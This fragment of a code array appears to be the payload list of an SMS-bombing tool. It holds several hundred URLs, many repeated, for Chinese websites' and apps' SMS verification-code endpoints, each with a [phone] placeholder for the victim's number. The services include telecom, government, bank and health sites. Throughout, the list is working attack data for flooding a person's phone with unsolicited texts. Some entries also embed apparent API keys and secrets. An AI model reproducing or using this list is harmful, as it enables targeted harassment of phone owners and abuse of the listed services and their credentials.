"http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://koudaitong.com/v2/common/sms/captcha.jsonp?callback=jQuery1102020099561656467435_1430461129946&verifyTimes=1&biz=kdt_account_captcha&_=1430461129949&mobile=[phone]", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", + "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]&nodeCode=ecdc5307-888e-4322-8817-f04bd81a7e82", + "https://p.doras.api.vcinema.cn/v5.0/user/[phone]/send_code", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://106.12.43.240/api.php?act=user&key=m898F3fn4rf53j643T42&phone=[phone]", + "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://appbackend.pohoocredit.com/pro-kuaixin-app-backend/app/user/captcha?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://hz.95sc.cn/api.php?act=user&key=7awn1zd6tRCRuTDD1c&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi 4A&osLevel=23&phone=[phone]&token=", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]&type=1", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://sms.bechtech.cn/Api/send/data/json?accesskey=1730&secretkey=3f198068c6b5c1036f9b38ae0690cc244695a247&mobile=[phone]&content=%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E9%AA%8C%E8%AF%81%E7%A0%81%E4%B8%BA%EF%BC%9A3973+%EF%BC%8C%E8%AF%A5%E9%AA%8C%E8%AF%81%E7%A0%8110%", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=13", + "http://doc.u-ease.com:80/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]&AppVersion=6357251", + "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]&code=&isSupportSession=1&src=ios&token=5d3fa06f6d96f74c953459ba&ver=5.1.2", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://www.ahtba.org.cn/Registration/SendSms?phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", + "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", + "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", + "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", + "https://ly.hao315.com/MsgYzm.php?tel=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://m.mgqr.com/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "http://voip-newapi20160601.voip-oem.com/api/Account/GetValidateCodeNoUser?SrcPhone=[phone]&type=1&proxyId=5318302", + "https://api.xinmaotong.cn/flw-auth/code?phone=[phone]&type=0", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://jz.gymchina.com/api/user/getVerificationCode.json?phone=[phone]&platform=and&sid=43d54311742a6c62a11ef8b64d8c7ac1&brand=OPPO&version=2.2.6&appName=tomato&partner=xiaomi&model=PCRT00", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://jyqb.jyqb168.com/registerH5/registerCode?phone=[phone]", + "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", + "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", + "http://www.gkbbapp.com/Support/JsonNews.aspx?sendShortMessage=yes&Telephone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]", + "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]&signature=ec57ab48b2c35a1f71e21989bccbcee9&uuid=385e205a-505b-49f1-a28d-abacf0c65012", + "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", + "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://user.app.nanrenbang.in/user/user/getvalidate?phone=[phone]", + "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.zuisgo.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&firewallToken=jkjslfskjk8545sfsdf&uid=&token=&loginTime=&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://www.hx2car.com/mobile/loginCode.json?code=d889c6084be2613b8ed976d2336bc53a&devicetoken=0FAEEA4E-B279-4409-93A6-05B4EDE49DE8&phoNum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]", + "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]&PUBLIC_SERVICE_TYPE=0&hospitalID=&isRead=1&loc=c&", + "http://passport.58.com/mobileauthcodelogin/getcode?valIDAtecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", + "http://www.ydhz.xyz/index.php?hm=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", + "http://passport.58.com/mobileauthcodelogin/getcode?validatecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", + "http://photograph.yuanlikj.cn/send/Send?appName=%E6%88%AA%E5%9B%BE%E7%A7%80-%E5%AF%B9%E8%AF%9D%E7%94%9F%E6%88%90%E5%99%A8&TELMobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", + "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", + "http://bj.iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?df=android&publishid=1003&deviceId=8812baafc8de4fe4&vt=5&screen=720x1280&deviceid=&os=android&proid=qknode&av=MMB29M&appVersion=1.6.1&imei=&ov=6.0.1&osVersion=6.0.1&deviceVersion=Redmi%204A&osLevel=23&phone=[phone]&token=", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://v2.tgmmvip.com:80/wolong/user/getphonecode?phone=[phone]&deviceid=864680046080077&type=0", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", + "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", + "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", + "http://www.newtank.cn/newtank/act/sendCaptcha.do?activityId=161&channelId=15399&_d=1506594279964&mobile=[phone]&_=1551173567874", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://server.daiyudianjing.com/User/GetShortMessage?phone=[phone]&type=0&Timestamp=1562547880955&Nonstr=4A4EC434EC1697BAB69253B3293FF032", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", + "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", + "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "https://api.aihecong.com/account/vercode?type=register&antiBrush=ecdfddd24937106ex&callback=JSONP_1580388414994&tel=[phone]", + "http://m.cqrenrenle.com/v3/users/code?mobile=[phone]&from=reg&packagename=com.feifan.app&platform=android", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&ararea=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4&degrees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]&os_version=12.4&scree", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://appv2.lygou.cc/loyouser/getBindCode?appfrom=203&appver=3.2.2&identity=%2B86[phone]&platform=2&realVer=3.2.2&region=zh-CN&time_zone=28800&type=0&unlogin_token=724767db76a9c95e817d0101be771480&version_code=138", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", + "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://qhg.api.nbxuanma.com/api/VerifyCode/Send?Phone=[phone]", + "http://newm.yktour.com.cn/api/captcha/login/info/get?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://jjy.3g.fang.com/httpclient/agentservice.jsp?groupFlag=ESF&messagename=jjy_getPassportandCustomerIds&phone=[phone]&wirelesscode=57b34f0c5725ee3d9e76c2619c394ae8", + "http://v2.tgmmvip.com:80/wolong/user/getphonecode?phone=[phone]&deviceid=864680046080077&type=0", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8,1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "https://api.taoelement.vip:443/account/sms/sms/captcha/[phone]/mineTker", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", + "http://www.jxxw.com.cn/app/user/sendLoginCode?username=[phone]&sign=572bf336d708a2b8b655ea05872cb596", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", + "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]&sign=20f2f798a813a8115f5a837c7cad140b&timestamp=1566033453", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://gw.dianzuanmao.com/user/getCsbCode?phone=[phone]&type=1", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]&v=5.5.32.83027", + "https://passport.beva.com/passport/v1/sdk/sendvcode?callback=jQuery111009421744498287961_1580993309090&nonce=1569211859&devcode=1E0D9617438F4A0DBED0AEB20FF19A50&mobile=[phone]&scene=mobilelogin&sign=cba0ddbe3e68126d5d24d2d6342754d6&platform=6&_=1580993309095", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://www.sbsq.aliwe.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://doctor.helianhealth.com/api/v3/auth/common/getSMScode?cellphone=[phone]&sign=d821db6c5629ea532b9f8ff95e39e952&smsType=1&timestamp=1568266253&type=1", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", + "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", + "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", + "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", + "https://uas.xingshulin.com/passport/default/captcha/LOGIN/sms/[phone]?", + "http://www.gmsweipai.com/gms/api/common/[phone]/requestsms/5?mchCode=861913032338784", + 